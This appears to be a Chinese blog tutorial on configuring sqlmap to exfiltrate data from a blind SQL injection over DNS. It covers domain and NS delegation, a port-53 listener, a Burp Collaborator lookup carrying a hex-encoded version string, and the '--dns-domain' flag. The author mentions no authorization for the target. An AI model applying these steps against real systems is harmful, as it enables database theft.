写点什么

SQLMAP _DNS 注入配置方法

  • 2022-12-06
    湖南
  • 本文字数:841 字

    阅读完需:约 3 分钟

网上针对 sqlmap 进行 dns 注入的相关文章太少,只是简单介绍了下--dns-domain 参数,相关的实战文章要么就模糊或者一笔带过,。然后参考网上的方法重新整理了一遍,简单理解。


需要准备的东西,sqlmap、windows 盲注一个、两个域名、一台外网服务器。



某次搞事情的时候碰到一个时间盲注,碰巧是台 windows 的,想起 dns 注入的方法。



在开始前我准备先用 sqlmap 的--sql-shell 命令进行 dns 注入 payload 的测试



先到 burpsuite 中的 collaborator client 中复制出 burp 给我们安排的域名


【一一帮助安全学习,所有资源获取一一】

①网络安全学习路线

②20 份渗透测试电子书

③安全攻防 357 页笔记

④50 份安全攻防面试指南

⑤安全红队渗透工具包

⑥网络安全必备书籍

⑦100 个漏洞实战案例

⑧安全大厂内部视频资源

⑨历年 CTF 夺旗赛题解析


在利用 sqlmap 执行 sql 语句



Sqlmap 还在跑的过程中 burpsuite 中已经接收到请求了。



352E362E3134.9hreqpopru1xgf9skq473yo14sajy8.burpcollaborator.net.


中的 352E362E3134 就是执行 version()后返回的结果。



解码获取到 mysql 的版本。好了至此这个点进行 dns 注入是没毛病的。


准备配置域名 2 个,网上有些文章说一个也行,但是总感觉较为麻烦,很多域名服务器商也并未提供某些高级功能,所以还是准备两个的简单些。


www.a.comwww.b.com
复制代码


首先我们来配置域名 a-> a.com



只需要添加*进行泛解析指向我们的外网服务器的 ip 就可以了。


在来配置我们的域名 b->b.com



这个就更简单了,直接修改域名的 dns,就填入ns1.a.com ns2.a.com 就行了其他的都不用搞,照着填写就行了。


然后等待域名生效。我们在到外网服务器上来测试下看是否解析成功



服务器上开始监听 53 端口



然后本机ping hello.b.com 在外网服务器上发我们已经能接受到hello.b.com的请求,并且本机提示是找不到主机不用管,因为我们没有设置解析。已经都配置完毕我们使用 sqlmap 进行 dns 注入即可。



Sqlmap 中加入参数--dns-domain=b.com --hex 即可



来到这一步 sqlmap 会卡住提示设置 DNS 服务器实例


直接 ctrl+c



提示通过 DNS 通道的数据检索成功。


注入的速度就跟报错和联合一样快了,再也不用忍受龟速了。

用户头像

我是一名网络安全渗透师 2021-06-18 加入

关注我,后续将会带来更多精选作品,需要资料+wx:mengmengji08

评论

发布
暂无评论
SQLMAP _DNS注入配置方法_网络安全_网络安全学海_InfoQ写作社区